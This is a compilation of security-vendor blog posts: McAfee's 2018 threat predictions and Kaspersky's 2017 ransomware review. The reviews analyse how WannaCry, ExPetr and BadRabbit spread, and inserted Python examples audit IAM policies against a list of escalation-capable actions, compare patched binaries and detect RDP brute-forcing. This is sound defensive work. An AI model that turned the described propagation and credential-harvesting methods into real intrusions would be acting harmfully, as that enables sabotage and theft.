Whenever defenders come out with something new, the attackers try to learn as much about it as possible. Adversaries have been doing this for years with malware signatures and reputation systems, for example, and we expect them to do the same with the machine learning models. This will be a combination of probing from the outside to map the model, reading published research and public domain material, or trying to exploit an insider. The goal is evasion or poisoning. Once attackers think they have a reasonable recreation of a model, they will work to get past it, or to damage the model so that either their malware gets through or nothing gets through and the model is worthless.

On the defenders’ side, we will also combine machine learning, AI, and game theory to probe for vulnerabilities in both our software and the systems we protect, to plug holes before criminals can exploit them. Think of this as the next step beyond penetration testing, using the vast capacity and unique insights of machines to seek bugs and other exploitable weaknesses.

Because adversaries will attack the models, defenders will respond with layers of models—operating independently—at the endpoint, in the cloud, and in the data center. Each model has access to different inputs and is trained on different data sets, providing overlapping protections. Speaking of data, one of the biggest challenges in creating machine learning models is gathering data that is relevant and representative of the rapidly changing malware environment. We expect to see more progress in this area in the coming year, as researchers gain more experience with data sets and learn the effects of old or bad data, resulting in improved training methods and sensitivity testing.

The machines are rising. They will work with whoever feeds them data, connectivity, and electricity. Our job is to advance their capabilities faster than the attackers, and to protect our models from discovery and disruption. Working together, human-machine teaming shows great potential to swing the advantage back to the defenders.

Ransomware Pivots to New Targets, New Objectives

Swings from the traditional to new targets, technologies, tactics, and business models

McAfee sees an evolution in the nature and application of ransomware, one that we expect to continue through 2018 and beyond.

The good news about traditional ransomware. McAfee Labs saw total ransomware grow 56% over the past four quarters, but evidence from McAfee Advanced Threat Research indicates that the number of ransomware payments has declined over the last year.

Our researchers assert that the trend suggests a greater degree of success during the last 12 months by improved system backup efforts, free decryption tools, greater user and organizational awareness, and the collaborative actions of industry alliances such as NoMoreRansom.org and the Cyber Threat Alliance.

How cybercriminals are adjusting. These successes are forcing attackers to pivot to high-value ransomware targets, such as victims with the capacity to pay greater sums, and new devices lacking comparable vendor, industry, and educational action.

Targeting higher net-worth victims will continue the trend toward attacks that are more personal, using more sophisticated exploitation of social engineering techniques that deliver ransomware via spear phishing messages. These high-value targets will be attacked at their high-value endpoints, such as their increasingly expensive personal devices, including the latest generation of smart phones. Cloud backups on these devices have made them relatively free from traditional ransomware attacks. McAfee predicts that attackers will instead try to “brick” the phones, making them unusable unless a ransom payment is sent to restore them.

McAfee believes this pivot from the traditional is reflected in the slight decline in the number of overall ransomware families, as criminals shift to a smaller number of higher-value technologies and tactics, more talented purveyors of techniques, and more specialized, more capable ransomware-as-a-service providers.

New ransomware families discovered in 2017. On average, 20%‒30% per month of new samples are based on Hidden Tear ransomware code. Source: McAfee Labs.

The less sophisticated, mostly well-known, mostly predictable, one-to-many technology, tactics, and providers are simply failing to deliver the rewards to justify the investments, even modest ones.

If well-understood ransomware families survive and thrive, McAfee believes they will do so in the hands of trusted service providers that continue to establish themselves with more established, sophisticated backends, as is currently the case with the Locky family.

Where the digital impacts the physical. Every year, we read predictions about threats to our physical safety from security breaches of industrial systems in transportation, water, and power. We are also perennially entertained with creative depictions of physical threats brought about by the imminent hacking rampage of consumer devices, from the car to the coffeemaker.

McAfee resists the temptation to join the cybersecurity-vendor chorus line to warn you of the danger that lurks within your vacuum cleaner. But our researchers do foresee digital attacks impacting the physical world. Cybercriminals have an incentive to place ransomware on connected devices providing a high-value service or function to high-value individuals and organizations.

Rather than seize control of your grandmother’s automobile brakes as she drives along a winding mountain road, our researchers believe it more likely and more profitable for cybercriminals to apply ransomware to an important business executive’s car, preventing them from driving to work. We believe it more likely and more profitable for cybercriminals to place ransomware on a wealthy family’s thermostat in the dead of winter, than to set the homes of millions ablaze through their coffeemakers.

In these and other ways, we believe cybercriminals will see greater return in orchestrating digital attacks that physically impact individuals for profit, rather than fatal damage.

Beyond extortion to disruption and destruction. The WannaCry and NotPetya ransomware outbreaks foreshadow a trend of ransomware being applied in new ways, in pursuit of new objectives, becoming less about traditional ransomware extortion and more about outright system sabotage, disruption, and damage.

The WannaCry and NotPetya campaigns quickly infected large numbers of systems with ransomware, but without the payment or decryption capabilities necessary to unlock impacted systems. Although the exact objectives are still unclear, McAfee believes the attackers could have sought to blatantly disrupt or destroy huge networks of computers, or disrupt and distract IT security teams from identifying other attacks, in much the same way DDoS attacks have been used to obscure other real aspects of attacks. It is also possible that they represented spectacular proofs of concept, demonstrating their disruptive and destructive power, intending to engage large organizations with mega-extortion demands in the future.

In 2018, McAfee expects to see ransomware used in the manner of WannaCry and NotPetya. Ransomware-as-a-service providers will make such attacks available to countries, corporations, and other nonstate actors seeking to paralyze national, political, and business rivals in much the same way that NotPetya attackers knocked global IT systems out of commission at corporations around the world. We expect an increase in attacks intended to cause damage, whether by unscrupulous competitors or by criminals trying to mimic a mafia-style protection racket in cyber form.

Although this weaponization of ransomware at first seems to stretch the definition of the technology and tactical concept, consider the incentive of avoiding a WannaCry or NotPetya specific to your organization, complete with rapid, wormlike propagation and a demonstration of material disruption and damage, but with a demand for payment to make it all stop.

Of course, this raises the biggest, unavoidable ransomware question of 2017: Were WannaCry and NotPetya actually ransomware campaigns that failed in their objectives to make significant revenue? Or perhaps incredibly successful wiper campaigns?

Finally, McAfee predicts that these shifts in the nature and objectives of ransomware attacks, and their potential for real material financial impacts, will create an opportunity for insurance companies to extend their digital offerings with a range of ransomware insurance.

Serverless Apps: New Opportunities for Friend and Foe

This section was updated on December 11th.

Serverless apps attempt to match the security of a container or virtual machine

“Serverless” apps, the latest aspect of virtual computing, enable a new degree of abstraction in application development, by leveraging Functions as a Service (FaaS) for their computation requirements. Functions are billed only while they are executing, including sub-second billing (AWS Lambda charges per 100ms). Paying only for executing business logic, as opposed to running a full container or a virtual machine, can reduce costs by a factor of 10 for some operations. But what about the security of these function calls? They are vulnerable in traditional ways, such as privilege escalation and application dependencies, but also in new ways, such as traffic in transit and an increased attack surface.

Let’s start with the traditional vulnerabilities. Serverless apps that are quickly implemented or rapidly deployed can use an inappropriate privilege level, leaving the environment open to a privilege escalation attack. Achieving least privilege is more difficult with more components to protect, contain, and update. Similarly, the speed of deployment can result in a function depending on packages pulled from external repositories that are not under the organization’s control and have not been properly evaluated.

Then there are the new risks. Because serverless apps naturally scale and bill based on traffic, distributed denial of service attacks can more easily translate directly to the bottom line, depending on the number of simultaneous executions allowed by the application.

Another risk is data that may be leveraged by multiple functions to process a business transaction. Because a serverless application may include more components than prior application architectures, the data may be at more risk of interception or manipulation. Comprehensive and ubiquitous use of authentication and authorization between services and encryption of data both at rest and in transit should be leveraged.

We predict the increased granularity of serverless apps will lead to a comparable increase in the attack surface. More functions, transiting to one or more providers, means more area for an attacker to exploit or disrupt. Make sure your function development and deployment process includes the necessary security steps, and that traffic is appropriately protected by VPNs or encryption.
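As an added illustration (not part of the McAfee report), the following Python checks a function's execution-role policy for the two shortcuts the paragraphs above warn about: wildcard or escalation-capable grants that break least privilege, and an unbounded concurrency setting that lets a request flood scale the bill with it. The policy documents and the function-configuration dictionary are constructed for this example; the bucket, table and account identifiers are placeholders, the escalation-action list is an illustrative starting point rather than an exhaustive one, and the configuration dictionary only mimics the shape of Lambda's GetFunctionConcurrency response.

```python
"""Audit a serverless function's execution-role policy and concurrency setting.

Added example; the policy documents and function configuration below are
constructed for illustration, not taken from a real deployment.
"""
import fnmatch

# Actions that let a compromised function widen its own privileges.
# Assumption: an illustrative starting list, to be extended per environment.
ESCALATION_ACTIONS = {
    "iam:passrole", "iam:createpolicyversion", "iam:attachrolepolicy",
    "iam:putrolepolicy", "iam:createaccesskey", "lambda:updatefunctioncode",
    "lambda:addpermission", "sts:assumerole",
}

# Verbs treated as read-only when deciding whether Resource "*" is tolerable
# (assumption: a reviewer's heuristic, not an IAM-defined classification).
READ_ONLY_VERBS = ("get", "list", "describe", "head")


def _as_list(value):
    """IAM accepts a string or a list for Action/Resource; normalize to a list."""
    if value is None:
        return []
    return value if isinstance(value, list) else [value]


def _grants(action_pattern, concrete_action):
    """Case-insensitive IAM-style wildcard match: 'iam:Pass*' grants 'iam:passrole'."""
    return fnmatch.fnmatchcase(concrete_action.lower(), action_pattern.lower())


def _is_read_only(action):
    verb = action.split(":", 1)[-1].lower()
    return verb.startswith(READ_ONLY_VERBS)


def audit_policy(policy):
    """Return a list of findings for one IAM policy document (parsed JSON)."""
    findings = []
    for idx, stmt in enumerate(_as_list(policy.get("Statement"))):
        if stmt.get("Effect") != "Allow":
            continue  # Deny statements only narrow access
        actions = _as_list(stmt.get("Action"))
        resources = _as_list(stmt.get("Resource"))
        for action in actions:
            if action == "*" or action.endswith(":*"):
                findings.append(f"statement {idx}: wildcard action {action!r}")
                continue
            for esc in sorted(ESCALATION_ACTIONS):
                if _grants(action, esc):
                    findings.append(
                        f"statement {idx}: {action!r} grants escalation-capable {esc!r}")
        if "*" in resources and not all(_is_read_only(a) for a in actions):
            findings.append(
                f"statement {idx}: write-capable actions scoped to Resource '*'")
    return findings


def audit_concurrency(function_config, ceiling=100):
    """Flag unbounded scaling.  With no ReservedConcurrentExecutions the function
    can scale to the account limit, so attacker traffic scales the bill."""
    reserved = function_config.get("ReservedConcurrentExecutions")
    if reserved is None:
        return ["no reserved concurrency: cost scales with attacker traffic"]
    if reserved > ceiling:
        return [f"reserved concurrency {reserved} exceeds ceiling {ceiling}"]
    return []


# Constructed policy that a rushed deployment might ship.
PERMISSIVE_POLICY = {
    "Version": "2012-10-17",
    "Statement": [
        {"Effect": "Allow", "Action": ["s3:*", "dynamodb:*"], "Resource": "*"},
        {"Effect": "Allow", "Action": "iam:PassRole", "Resource": "*"},
    ],
}

# The same function's real needs, scoped to named resources (placeholder ARNs).
SCOPED_POLICY = {
    "Version": "2012-10-17",
    "Statement": [
        {"Effect": "Allow", "Action": ["s3:GetObject"],
         "Resource": "arn:aws:s3:::example-orders-bucket/incoming/*"},
        {"Effect": "Allow", "Action": ["dynamodb:GetItem", "dynamodb:PutItem"],
         "Resource": "arn:aws:dynamodb:us-east-1:123456789012:table/Orders"},
        {"Effect": "Allow", "Action": ["logs:CreateLogStream", "logs:PutLogEvents"],
         "Resource": "arn:aws:logs:us-east-1:123456789012:log-group:/aws/lambda/orders:*"},
    ],
}

if __name__ == "__main__":
    for name, policy in (("permissive", PERMISSIVE_POLICY), ("scoped", SCOPED_POLICY)):
        print(name, audit_policy(policy) or ["no findings"])
    print(audit_concurrency({}), audit_concurrency({"ReservedConcurrentExecutions": 20}))
```

Run against the two documents, the permissive policy produces five findings (two service-wide wildcards, one escalation-capable PassRole, and Resource "*" on both statements) while the scoped one is clean; the same check belongs in the deployment pipeline the paragraph above asks for, so a policy widened in a hurry fails the build rather than reaching production.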

When Your Home Becomes the Ultimate Storefront

Without controls, you might surrender your privacy to corporate marketers

Corporate marketers have powerful incentives to observe and understand the buying needs and preferences of connected home device owners. Networked devices already transmit a significant amount of information without the knowledge of the overwhelming majority of consumers. Customers rarely read privacy agreements, and, knowing this, corporations are likely to be tempted to frequently change them after the devices and services are deployed to capture more information and monetize it.

In 2018, connected home device manufacturers and service providers will seek to overcome thin operating margins by gathering more of our personal data—with or without our agreement—as we practically surrender the home to become a corporate virtual store front.

With such dynamics in play, and with the technical capabilities already available to device makers, corporations could offer discounts on devices and services in return for the ability to monitor consumer behavior at the most personal level.

Rooms, devices, and apps are easily equipped with sensors and controls capable enough to inform corporate partners of the condition of home appliances, and bombard consumers with special upgrade and replacement offers.

It is already possible for children’s toys to monitor their behavior and suggest new toys and games for them, including upgrades for brand-name content subscriptions and online educational programs.

It is already possible for car manufacturers and their service centers to know the location of specific cars, and coordinate with owners’ calendars and personal assistants to manage and assist in the planning of their commutes. Coffee, food, and shopping stops could automatically be integrated into their schedules, based on their preferences and special offers from favorite food and beverage brands.

Whether this strikes you as a utopia for consumers and marketers, or a dystopian nightmare for privacy advocates, many aspects of these scenarios are close to reality.

Data collection from the current wide range of consumer devices and services is running far ahead of what most people believe.

Although there is certainly a legal argument that consumers have agreed to the collection of their data, even those of us technically knowledgeable enough to know this is taking place do not read the contracts that we agree to, and some corporations might change them after the fact or go beyond what they promise.

We have seen numerous examples of corporate malfeasance in recent years. A flashlight app developer’s license agreement did not disclose that the app gathered geolocation data. Three years ago, a video game hardware company pushed an update with no option to refuse; users had to agree to new terms or stop using the product they had purchased. In many agreements, users “agree” to all future changes that the company makes unilaterally to the terms: “Continued use of the service after any such changes shall constitute your consent to such changes.”

In July, the US Federal Bureau of Investigation warned parents to be wary of connected children’s toys that could be capable of collecting their children’s personally identifiable information.

Businesses will continue to seek to understand what and how consumers consume in the privacy of their homes, certainly requiring more user data than consumers will likely be comfortable sharing. McAfee asserts that a substantial number of corporations will break privacy laws, pay fines, and still continue such practices, thinking they can do so profitably. But the FBI’s recent toy warning to parents might suggest that such approaches could result in regulatory and even criminal legal consequences.

Next year will provide new examples of how well, and how badly, corporations are able to navigate the temptations and opportunities presented by connected homes.

We thank the Electronic Frontier Foundation for their assistance with this article.

Inside Your Child’s Digital Backpack

Protecting your children from corporate abuse of their user-generated content

It seems that every product, service, or experience we interact with today creates some type of digital record, whether or not we like it. As adults, we are gradually coming to terms with this effect and learning to manage our digital lives, but what about our children? Employers are already making hiring decisions influenced by search results. Could this extend to schools, health care, and governments? Will children be denied entry to a school because of how much time they spent binge-watching videos, or find it difficult to run for office because of a video made when they were seven?

Online information, or digital baggage, can be positive, negative, or neutral. As our children go on their increasingly digital journey through life, what are they packing for their trip? Likely, it will be a combination of mostly innocuous and trivial things, some positive and amazing ones that will help them on their journey, and some negative items that could weigh them down. Unfortunately, we predict that many future adults will suffer from negative digital baggage, even if it comes about without their intention.

As parents, our challenge is to help our children navigate this new world, in which they can be tracked almost from the moment of conception. Remember that story from 2012 about a girl who received coupons from a retailer for pregnancy-related items before she acknowledged that she was pregnant?

To help our children, we need to understand the kinds of digital artifacts that are being captured and stored. There are generally three types: explicit, implicit, and inadvertent.

Explicit content is all of those things that happen after you click the “I Agree” button on the terms and conditions or end user license agreement. Given recent breaches, it seems that anything stored online will at some point be hacked, so why not assume that from the beginning? If they really want to, a prospective employer may be able to find out what content you created, your social habits, and a host of other data points. This is an area that parents (at least initially) have a lot of control and influence over, and can teach and model good habits. Are you buying “M”-rated games for your 10-year-old, or letting your teens post videos without some oversight? Sadly, what happens online is not private, and there could eventually be consequences.

Implicit content is anything you do or say in an otherwise public place, which could be photographed, recorded, or somehow documented. This ranges from acting silly to drinking or taking drugs, but also includes what people say, post, tweet, etc. in public or online. We do not think that childlike behavior (by children) is going to be frequently or successfully used against people in the future, so we can still let our kids be kids.

Inadvertent content is the danger area. These are items that were intended to remain private, or were never expected to be captured. Unfortunately, inadvertent content is becoming increasingly common, as organizations of all types (accidentally or on purpose) bend and break their own privacy agreements in a quest to capture more about us. Whether with a toy, a tablet, a TV, a home speaker, or some other device, someone is capturing your child’s words and actions and sending them to the cloud. This is the most challenging part of the digital journey, and one that we must manage vigilantly. Pay attention to what you buy and install, turn off unnecessary features, and change the default passwords to something much stronger!

Our children face an amazing potential future, full of wonderful gadgets, supportive services, and amazing experiences. Let’s teach them at home to pack their digital backpacks so that they can make the most of it.

In the corporate world, McAfee predicts that the May 2018 implementation of the European Union’s General Data Protection Regulation (GDPR) could play an important role in setting ground rules on the handling of both consumer data and user-generated content in the years to come. The new regulatory regime impacts companies that either have a business presence in EU countries, or process the personal data of EU residents, meaning that companies from around the world will be compelled to adjust the way in which they process, store, and protect customers’ personal data. Forward-looking businesses can leverage this to set best practices that benefit customers using consumer appliances, content-generating app platforms, and the online cloud-based services behind them.

In this regard, the year 2018 may well best be remembered for whether consumers truly have the right to be forgotten.

To find out more about the data protection opportunity for businesses, visit McAfee’s GDPR site.

For more on how to protect your children from potential user-generated content abuse and other digital threats, please see McAfee’s blogs for guidance on parenting in the digital age.

Contributors

  • Christiaan Beek
  • Lisa Depew
  • Magi Diego
  • Daren Dunkel
  • Celeste Fralick
  • Paula Greve
  • Lynda Grindstaff
  • Steve Grobman
  • Kenneth Howard
  • Abhishek Karnik
  • Sherin Mathews
  • Jesse Michael
  • Raj Samani
  • Mickey Shkatov
  • Dan Sommer
  • Vincent Weafer
  • Eric Wuehler
  • Jonathan King


About McAfee Labs

McAfee Labs is one of the world’s leading sources for threat research, threat intelligence, and cybersecurity thought leadership. With data from millions of sensors across key threat vectors—file, web, message, and network—McAfee Labs delivers real-time threat intelligence, critical analysis, and expert thinking to improve protection and reduce risks.

To learn more about our predictions for 2018, register for our January 9th webcast.

The post ‘McAfee Labs 2018 Threats Predictions Report’ Previews Five Cybersecurity Trends appeared first on McAfee Blogs.

Kaspersky Security Bulletin: Story of the year 2017

 Download the Kaspersky Security Bulletin: Story of the year 2017

Introduction: what we learned in 2017

In 2017, the ransomware threat suddenly and spectacularly evolved. Three unprecedented outbreaks transformed the landscape for ransomware, probably forever. The attacks targeted businesses and used worms and recently leaked exploits to self-propagate, encrypting data and demanding a ransom they didn’t really want. The perpetrators of these attacks are unlikely to be the common thieves usually lurking behind ransomware. At least one of the attacks carried flaws that suggest it may have been released too soon, another spread via compromised business software, two are related and the two biggest appear to have been designed for data destruction. The cost to victims of these three attacks is already running into hundreds of millions of dollars.

Welcome to ransomware in 2017 – the year global enterprises and industrial systems were added to the ever-growing list of victims, and targeted attackers started taking a serious interest in the threat. It was also a year of consistently high attack numbers, but limited innovation.

This short paper highlights some of the key moments.

The massive outbreaks that were not all they seemed

WannaCry

It all started on May 12, when the security community observed something it hadn’t seen for almost a decade: a cyberattack with a worm that spread uncontrollably. On this occasion the worm was designed to install the WannaCry crypto-ransomware on infected machines.

The WannaCry epidemic affected hundreds of thousands of computers around the globe. To propagate, the worm used an exploit dubbed EternalBlue and the DoublePulsar backdoor, both of which had been made public by the Shadow Brokers group a month prior to the outbreak. The worm automatically targeted all computers sharing the same local subnet as the infected machine, as well as random IP ranges outside the local network – spreading it rapidly across the world.

To infect a machine, WannaCry exploited a vulnerability in the Windows implementation of the SMB protocol. Microsoft had released an update to fix this vulnerability back in March 2017, but the number of unpatched machines remained so high that this hardly hindered the propagation of WannaCry.

After infecting a machine and executing a routine to spread further, WannaCry encrypted some valuable files belonging to the victim and displayed a ransom note. Full decryption of the affected files was impossible without paying the ransom – although our analysts discovered several flaws in WannaCry’s code that could allow some victims to restore some of their data without paying the ransom.

Impact of WannaCry

The attack was industry-agnostic, and victims were mainly organizations with networked systems. The ransomware also hit embedded systems. These often run on legacy OS and are therefore particularly vulnerable. Victims received a ransom demand to be paid in bitcoins. Reports suggest the ultimate number of victims could be as high as three-quarters of a million.

Car maker Renault had to close its largest factory in France and hospitals in the UK had to turn away patients. German transport giant Deutsche Bahn, Spain’s Telefónica, the West Bengal power distribution company, FedEx, Hitachi and the Russian Interior Ministry were all hit, too. A month after the initial outbreak had been contained, WannaCry was still claiming victims, including Honda, which was forced to shut down one of its production facilities, and 55 speed cameras in Victoria, Australia.

The unanswered questions about WannaCry

As a devastating high profile attack targeting businesses, WannaCry was extremely successful. As a ransomware plot to make lots of money, it was a failure. Spreading via a worm is not advisable for a threat that is most lucrative when silently stalking the shadows. Estimates suggest it only made around $55,000 in bitcoin, hampered by its high visibility. The code was poor in places, and there are suggestions that it escaped into the wild before it was fully ready. There are also a number of indicators, including early code similarities that suggest the group behind WannaCry is the infamous Korean-speaking threat actor Lazarus.

The true purpose of the WannaCry attack may never be known – was it ransomware gone wrong or a deliberate destructive attack disguised as ransomware?

ExPetr

The second big attack came just six weeks later, on June 27. This was spread predominantly through a supply chain infection and targeted machines mainly in Ukraine, Russia and western Europe. The company’s telemetry indicates that there were more than 5,000 attacked users. Victims received a ‘ransom demand’ of around $300, to be paid in bitcoins – although it turned out that even then they couldn’t get their files back.

ExPetr was a complex attack, involving several vectors of compromise. These included modified EternalBlue (also used by WannaCry) and EternalRomance exploits and the DoublePulsar backdoor for propagation within the corporate network; compromised MeDoc accounting software, which distributed the malware through software updates; and a compromised news website for Ukraine’s Bakhmut region that was used as a watering hole by the attackers.

What’s more, ExPetr was capable of spreading even to properly patched machines in the same local network as the initially infected computer. To do that, it harvested credentials from the infected system by means of a Mimikatz-like tool and proceeded with lateral movement using the PsExec or WMIC tools.

The encrypting component of ExPetr operated on two levels: encrypting the victim’s files with the AES-128 algorithm and then installing a modified bootloader taken from another malicious program – GoldenEye (the successor of the original Petya). This malicious bootloader encrypted the MFT, a critical data structure of the NTFS file system, and prevented further boot processes, asking for a ransom.

Impact of ExPetr

Victims of ExPetr included major organizations such as shipping ports, supermarkets, ad agencies and law firms: for example, Maersk, FedEx (TNT) and WPP. A month after the attack, TNT’s deliveries were still affected, with SMB customers suffering most. Another victim, consumer goods giant Reckitt Benckiser, lost access to 15,000 laptops, 2,000 servers and 500 computer systems in the space of just 45 minutes when the attack hit – and expects the cost to the business to be over $130 million. Maersk announced a revenue loss of around $300 million due to the attack.

The unanswered questions about ExPetr

Kaspersky Lab experts have found similarities between ExPetr and early variants of BlackEnergy’s KillDisk code – but the true motivation and purpose behind ExPetr also remain unknown.

BadRabbit

Then, in late October, another crypto-worm, BadRabbit, appeared. The initial infection started as a drive-by download served from a number of compromised websites and mimicking an update for Adobe Flash Player. When launched on a victim’s computer, BadRabbit’s worm component attempted to self-propagate using the EternalRomance exploit and to employ a lateral movement technique similar to the one utilized by ExPetr. Most of BadRabbit’s targets were located in Russia, Ukraine, Turkey and Germany.

The ransomware component of BadRabbit encrypted the victim’s files and then encrypted whole disk partitions using modules of the legitimate utility DiskCryptor. The analysis of the code of BadRabbit samples and techniques suggests there is a notable similarity between this malware and ExPetr. However, unlike ExPetr, BadRabbit does not appear to be a wiper, as its cryptographic scheme technically allows the threat actors to decrypt the victim’s computer.

Leaked exploits powered many new waves of attacks

The criminals behind the aforementioned ransomware outbreaks were not the only ones to use the code of exploits leaked by the Shadow Brokers to wreak havoc.

We have discovered some other not-so-notorious ransomware families that at some point used the same exploits. Among them are AES-NI (Trojan-Ransom.Win32.AecHu) and Uiwix (a variant of Trojan-Ransom.Win32.Cryptoff). These malware families are ‘pure’ ransomware in the sense that they do not contain any worm capabilities, i.e. cannot self-replicate, which is why they did not spread nearly as widely as WannaCry, for instance. However, the threat actors behind these malware families exploited the same vulnerabilities on victims’ computers during the initial infections.

Master keys released for several ransomware families

Apart from the large-scale epidemics that shook the world, in Q2 2017 an interesting trend emerged: several criminal groups behind different ransomware cryptors concluded their activities and published the secret keys needed to decrypt victims’ files.

Below is the list of families for which keys became public in Q2:

  • Crysis (Trojan-Ransom.Win32.Crusis);
  • AES-NI (Trojan-Ransom.Win32.AecHu);
  • xdata (Trojan-Ransom.Win32.AecHu);
  • Petya/Mischa/GoldenEye (Trojan-Ransom.Win32.Petr).

The Petya/Mischa/GoldenEye master key was released shortly after the outbreak of ExPetr and might have been an attempt by the original Petya authors to show that they were not the ones behind ExPetr.

The reappearance of Crysis

Despite the fact that the Crysis ransomware appeared to die in May 2017 following the release of all the master keys, it didn’t stay dead for long. In August, we started discovering numerous new samples of this ransomware and they turned out to be almost identical copies of the previously distributed samples, with only a few differences: they had new master public keys, new email addresses that victims were supposed to use to contact the criminals, and new extensions for the encrypted files. Everything else remained unchanged – even the timestamps in the PE headers. After thorough analysis of the old and new samples, our analysts concluded that most likely the new samples were created by binary patching the old ones using a hex editor. One reason for this might be that the criminals behind the new samples didn’t possess the source code and simply reverse-engineered the ransomware to raise it from the dead and use it for their own ends.
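To show the kind of comparison that supports the "patched with a hex editor" conclusion, here is an added Python example (not Kaspersky's analysis code). It builds two minimal PE-shaped stubs standing in for an older and a newer sample, reads the COFF TimeDateStamp from each, and lists the byte ranges that differ: identical size, identical link timestamp and differences confined to a few small ranges fit in-place patching, whereas a recompile stamps a new TimeDateStamp and normally perturbs offsets throughout the file. The stubs, contact addresses, extensions and "keys" are constructed for illustration and the 5% changed-bytes threshold is an assumed heuristic.

```python
"""Compare two builds of one ransomware family for signs of binary patching.

Added example, not Kaspersky's analysis code.  The 'samples' are minimal
PE-shaped stubs constructed in memory; e-mail addresses, extensions and keys
are invented.
"""
import struct

E_LFANEW_OFFSET = 0x3C     # DOS header field holding the offset of 'PE\0\0'
COFF_TIMESTAMP_OFFSET = 8  # 'PE\0\0' (4) + Machine (2) + NumberOfSections (2)


def build_stub_pe(timestamp, email, extension, pubkey, padding=b"\x90" * 1024):
    """Assemble a stub with a real PE header layout followed by a fixed-width
    'data section' holding the three fields the operators changed.  Fixed
    widths matter: a hex-editor patch overwrites bytes in place, never moves them."""
    dos = bytearray(b"MZ" + b"\x00" * 62)
    struct.pack_into("<I", dos, E_LFANEW_OFFSET, len(dos))
    # COFF header: Machine, NumberOfSections, TimeDateStamp, PointerToSymbolTable,
    # NumberOfSymbols, SizeOfOptionalHeader, Characteristics
    coff = struct.pack("<HHIIIHH", 0x14C, 1, timestamp, 0, 0, 0xE0, 0x0102)
    data = (padding
            + email.ljust(40, "\x00").encode()
            + extension.ljust(16, "\x00").encode()
            + pubkey
            + padding)
    return bytes(dos) + b"PE\0\0" + coff + data


def pe_timestamp(blob):
    """Return the COFF TimeDateStamp, or None if the headers are not PE-shaped."""
    if len(blob) < E_LFANEW_OFFSET + 4 or blob[:2] != b"MZ":
        return None
    (e_lfanew,) = struct.unpack_from("<I", blob, E_LFANEW_OFFSET)
    if blob[e_lfanew:e_lfanew + 4] != b"PE\0\0" or len(blob) < e_lfanew + 24:
        return None
    (stamp,) = struct.unpack_from("<I", blob, e_lfanew + COFF_TIMESTAMP_OFFSET)
    return stamp


def diff_ranges(old, new):
    """Return [(offset, length)] for each contiguous run of differing bytes
    over the common prefix of the two blobs."""
    ranges, start = [], None
    for i, (a, b) in enumerate(zip(old, new)):
        if a != b and start is None:
            start = i
        elif a == b and start is not None:
            ranges.append((start, i - start))
            start = None
    if start is not None:
        ranges.append((start, min(len(old), len(new)) - start))
    return ranges


def assess_patching(old, new, max_changed_fraction=0.05):
    """Heuristic verdict (threshold is an assumption).  Same size, same link
    timestamp and changes confined to a small fraction of the bytes fit
    in-place patching; a recompile changes the timestamp and shifts offsets."""
    ranges = diff_ranges(old, new)
    changed = sum(length for _, length in ranges)
    old_stamp, new_stamp = pe_timestamp(old), pe_timestamp(new)
    verdict = {
        "same_size": len(old) == len(new),
        "same_timestamp": old_stamp is not None and old_stamp == new_stamp,
        "changed_ranges": ranges,
        "changed_fraction": changed / max(len(old), 1),
    }
    verdict["likely_binary_patch"] = (
        verdict["same_size"] and verdict["same_timestamp"]
        and 0 < verdict["changed_fraction"] <= max_changed_fraction)
    return verdict


# Constructed stand-ins: the 'August' sample keeps the 'May' link timestamp and
# differs only in contact address, extension and embedded public key.
MAY_SAMPLE = build_stub_pe(0x5924A1F0, "restore@example-old.test", ".oldext", b"\x11" * 32)
AUGUST_SAMPLE = build_stub_pe(0x5924A1F0, "unlock@example-new.test", ".newext", b"\x22" * 32)
# A genuinely rebuilt binary carries a fresh timestamp.
REBUILT_SAMPLE = build_stub_pe(0x598BC300, "unlock@example-new.test", ".newext", b"\x22" * 32)

if __name__ == "__main__":
    print(assess_patching(MAY_SAMPLE, AUGUST_SAMPLE))
    print(assess_patching(MAY_SAMPLE, REBUILT_SAMPLE))
```

On real samples the same functions apply to the raw file bytes; the changed ranges then point straight at the patched strings and key material, which is what lets an analyst say the differences are the new contact address, extension and public key and nothing else.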

RDP infections continue to grow

In 2016, we noticed a new emerging trend among the most widespread ransomware. Instead of trying to trick the victim into launching a malicious executable or using exploit kits, the criminals turned to another infection vector. They were brute-forcing the RDP logins and passwords on machines that had RDP turned on and that were available for access from the Internet.

In 2017, this approach became one of the main propagation methods for several widespread families, such as Crysis, Purgen/GlobeImposter and Cryakl. This means that when securing a network, InfoSec specialists should keep this vector in mind and block RDP access from outside the corporate network.
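One way to put the RDP vector on the detection side as well, as an added example that is not part of the Kaspersky bulletin: the Python below walks Windows Security events and flags a source address that accumulates repeated Event ID 4625 failures with logon type 10 (RemoteInteractive, the RDP logon type), then records whether the same source went on to produce a 4624 success, the case that indicates a guessed password. The event records are constructed in a simple key=value export format for this example; the field names follow the Windows event schema, while the addresses, account names and times are invented, and the threshold and window are assumed tuning values.

```python
"""Flag RDP password brute-forcing in Windows Security events.

Added example, not from the Kaspersky bulletin.  The records below are
constructed; field names follow Event ID 4625/4624 (failed/successful logon),
addresses, accounts and times are invented.
"""
from collections import defaultdict, deque
from datetime import datetime, timedelta

FAILED_LOGON = 4625
SUCCESSFUL_LOGON = 4624
RDP_LOGON_TYPE = "10"   # RemoteInteractive: Terminal Services / RDP


def parse_event(line):
    """Parse one 'Field=value|Field=value' record (constructed export format)."""
    event = dict(part.split("=", 1) for part in line.split("|"))
    event["EventID"] = int(event["EventID"])
    event["Time"] = datetime.strptime(event["Time"], "%Y-%m-%dT%H:%M:%S")
    return event


def detect_rdp_bruteforce(events, threshold=5, window=timedelta(minutes=2)):
    """Return {source_ip: summary} for sources with >= `threshold` RDP logon
    failures inside any `window`.  A later RDP success from the same source is
    recorded as the guessed account: that is the alert to act on first."""
    recent = defaultdict(deque)   # ip -> failure timestamps inside the window
    tried = defaultdict(set)      # ip -> distinct accounts attempted
    alerts = {}
    for ev in sorted(events, key=lambda e: e["Time"]):
        if ev.get("LogonType") != RDP_LOGON_TYPE:
            continue  # console, network and service logons are out of scope
        ip = ev["IpAddress"]
        if ev["EventID"] == FAILED_LOGON:
            q = recent[ip]
            q.append(ev["Time"])
            tried[ip].add(ev["TargetUserName"].lower())
            while q and ev["Time"] - q[0] > window:
                q.popleft()  # drop failures that fell out of the window
            if len(q) >= threshold:
                summary = alerts.setdefault(ip, {
                    "failures_in_window": 0, "accounts": [],
                    "first_seen": q[0], "guessed_account": None})
                summary["failures_in_window"] = max(summary["failures_in_window"], len(q))
                summary["accounts"] = sorted(tried[ip])
        elif ev["EventID"] == SUCCESSFUL_LOGON and ip in alerts:
            alerts[ip]["guessed_account"] = ev["TargetUserName"]
    return alerts


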